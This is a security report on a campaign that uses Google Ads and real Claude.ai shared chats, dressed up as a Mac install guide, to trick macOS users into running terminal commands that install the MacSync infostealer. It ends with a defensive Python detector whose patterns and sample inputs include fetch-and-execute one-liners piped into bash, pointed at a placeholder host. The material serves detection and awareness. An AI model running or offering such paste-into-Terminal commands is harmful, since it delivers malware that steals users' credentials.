Attackers are abusing Google Ads and legitimate Claude.ai shared chats to trick macOS users searching for “Claude mac download” into running malware through terminal commands. The campaign delivers polymorphic shell scripts and, in one variant, a MacSync infostealer that steals browser credentials, cookies, and Keychain data. #Claude.ai #MacSync #TrendyolGroup #AppleSupport
Key points
- Google Ads are being used to lure users searching for Claude downloads.
- The malicious destination is a real claude.ai shared chat, not a fake domain.
- The shared chat presents itself as an official “Claude Code on Mac” guide.
- The payload uses encoded shell scripts and polymorphic delivery to evade detection.
- One variant, the MacSync infostealer, steals browser credentials, cookies, and macOS Keychain data.
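Because the scripts are polymorphic, file hashes are of little use; a defender can match on the shape of the pasted terminal command instead. The sketch below is an added example, not code from the campaign or its reporters: the page does not publish the actual commands, so the patterns (curl/wget, base64 decoding, piping into a shell) and all sample commands are assumptions constructed for illustration.

```python
import re

# Assumed building blocks of a "paste this into Terminal" one-liner.
FETCH = re.compile(r"\b(?:curl|wget)\b")
DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b|\bxxd\s+-r\b")
# A pipeline stage that starts with an interpreter reading from stdin.
INTERP = re.compile(r"^\s*(?:sudo\s+)?(?:\S*/)?(?:bash|zsh|sh|osascript|python3?)\b")
# eval "$(...)" or sh -c "$(...)": output of a subcommand is executed.
SUBST_EXEC = re.compile(r"\b(?:eval|(?:bash|zsh|sh)\s+-c)\s+[\"']?(?:\$\(|`)")


def classify(command):
    """Return sorted reasons why a one-liner looks like paste-and-run delivery."""
    reasons = set()
    upstream_fetch = upstream_decode = False
    # Split on single pipes only, so "||" is not treated as a pipeline.
    for stage in re.split(r"(?<!\|)\|(?!\|)", command):
        if INTERP.search(stage):
            if upstream_fetch:
                reasons.add("download piped to interpreter")
            if upstream_decode:
                reasons.add("decoded blob piped to interpreter")
        upstream_fetch |= bool(FETCH.search(stage))
        upstream_decode |= bool(DECODE.search(stage))
    if SUBST_EXEC.search(command):
        if FETCH.search(command):
            reasons.add("download executed via command substitution")
        if DECODE.search(command):
            reasons.add("decoded blob executed via command substitution")
    return sorted(reasons)


# Constructed samples; the blob decodes to a harmless "echo hi".
SAMPLES = [
    'echo "ZWNobyBoaQ==" | base64 -D | zsh',
    "curl -fsSL https://downloads.example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://downloads.example.invalid/x | base64 --decode)"',
    "curl -fsSLO https://downloads.example.invalid/app.dmg",
    "base64 -d notes.b64 > notes.txt",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(classify(cmd) or ["no paste-and-run pattern"], "<-", cmd)
```

The same patterns can be applied to shell history, EDR process command lines, or clipboard contents before a command is run; they are heuristics and will also flag legitimate installers that use `curl | bash`.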